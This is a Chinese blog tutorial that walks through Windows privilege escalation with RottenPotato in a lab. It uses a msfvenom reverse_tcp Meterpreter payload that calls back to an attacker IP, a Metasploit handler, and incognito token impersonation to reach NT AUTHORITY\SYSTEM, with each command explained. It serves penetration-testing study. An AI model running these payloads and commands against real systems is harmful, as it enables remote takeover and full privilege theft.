windows操作系统提权之服务提权实战rottenpotato

想拿 0day 的脚步小子2024-06-02 8:15

RottenPotato:
将服务帐户本地提权至SYSTEM
load incognito
list_tokens --u
upload /home/kali/Desktop rottenpotato.exe .
execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\SYSTEM"
1.

load incognito

  • 这条命令用于加载 Metasploit 的 incognito 模块,该模块提供了一系列与 Windows 令牌操作相关的功能,比如令牌窃取、令牌操纵等。

list_tokens --u

  • list_token 命令用于列出当前会话中可用的访问令牌。-u 参数指定列出用户令牌,这些令牌代表系统中不同用户的访问权限。

upload /home/kali/Desktop rottenpotato.exe .

  • upload 命令用于将文件从攻击者的机器上传到目标机器。这里尝试上传 /root/rottenpotato.exe 文件到当前 Meterpreter 会话的工作目录。
  • 这条命令的意思是将位于 /home/kali/Desktop/ 目录下的 rottenpotato.exe 文件上传到 Meterpreter 会话的当前工作目录。如果当前工作目录是目标机器上的根目录,那么文件将被上传到那里

execute -Hc -f rottenpotato.exe

  • execute 命令用于在目标机器上执行一个程序。-Hc 参数指定隐藏控制台窗口,-f 参数指定执行指定的文件(这里是 rottenpotato.exe)。

impersonate_token "NT AUTHORITY\SYSTEM"

  • impersonate_token 命令用于模拟一个特定的访问令牌,从而获得该令牌的权限。这里指定模拟的是具有最高权限的系统令牌 NT AUTHORITY\SYSTEM

Meterpreter 会话输出中,list_tokens -u 命令被用来列出当前会话中可用的用户令牌。下面是输出结果的解释:

  1. Delegation Tokens Available:

    • 这部分列出了可用于委派的令牌。委派令牌允许一个服务代表另一个服务执行操作,通常用于服务之间的信任关系。
    • 在这个例子中,有一个用户令牌属于 GOD\Administrator,这意味着目标机器上的 Administrator 用户账户的令牌是可用的,并且可以被用来进行令牌窃取或模拟。

  2. Impersonation Tokens Available:

    • 这部分列出了可用于模拟的令牌。模拟令牌允许一个进程以另一个用户的身份执行操作。
    • 在这个例子中,显示 "No tokens available",这意味着当前没有可用的模拟令牌。

当你在渗透测试或安全评估中使用 Meterpreter 时,这些信息非常有用,因为它们可以帮助你确定可以利用哪些账户的权限来提升你的会话权限或执行特定的任务。

具体流程

1.生成木马并放到win7上

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.247.130 LPORT=4444 -f exe >test.exe

2.msfconsole进行监听

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.247.130

set LPORT 4444

exploit

3.加载 Metasploit 的 incognito 模块

load incognito

4.列出当前会话中可用的访问令牌

list_tokens --u

5.将烂土豆从攻击者的机器上传到目标机器

upload /home/kali/Desktop rottenpotato.exe .

6.查看目录烂土豆是否上传成功

7.将烂土豆执行

execute -Hc -f rottenpotato.exe

8. 模拟一个特定的访问令牌,从而获得该令牌的权限。这里指定模拟的是具有最高权限的系统令牌 NT AUTHORITY\SYSTEM

impersonate_token "NT AUTHORITY\SYSTEM"

9. 再次列出当前会话中可用的访问令牌

list_tokens --u

与第四步对比少了一句

-\] Warning: Not currently running as SYSTEM, not all tokens will be available Call rev2self if primary process token is SYSTEM 证明已经提权成功 ### 10.显示当前 Meterpreter 会话的运行用户(权限) getuid ![](https://img-blog.csdnimg.cn/direct/1bb0ac92897144e0ac0514e8c6d80101.png)

相关推荐
H轨迹H1 天前
Hack The Box-Chemistry靶机渗透
网络安全·渗透测试·kali·信息收集·web漏洞
扛枪的书生3 天前
Windows 提权-手工枚举
windows·渗透·kali·提权
H轨迹H3 天前
Hack The Box-Cap靶机
网络安全·渗透测试·kali·ftp·web漏洞·oscp
奕泽Yiz4 天前
ATT&CK实战系列(三)红日靶场3
内网
扛枪的书生8 天前
Windows 提权-服务_弱注册表权限
windows·渗透·kali·提权
扛枪的书生9 天前
Windows 提权-服务_DLL 劫持
windows·渗透·kali·提权
扛枪的书生10 天前
Windows 提权-服务_未引用的服务路径
windows·渗透·kali·提权
H轨迹H11 天前
Hack The Box-代理连接及靶机-Meow-喵呜
网络安全·渗透测试·hack the box·web漏洞
扛枪的书生11 天前
Windows 提权-服务_弱服务权限
windows·渗透·kali·提权
热门推荐
01DeepSeek各版本说明与优缺点分析02RAG 实践- Ollama+RagFlow 部署本地知识库03如何在WPS和Word/Excel中直接使用DeepSeek功能04FreeCAD傻瓜教程之创建参数化几何图形-螺旋体、平面、球体、椭球体、圆柱体、圆锥体、棱柱、椭圆05本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程06从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑07苍穹外卖面试总结08DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具09本地部署DeepSeek教程(Mac版本)10SQL 集合运算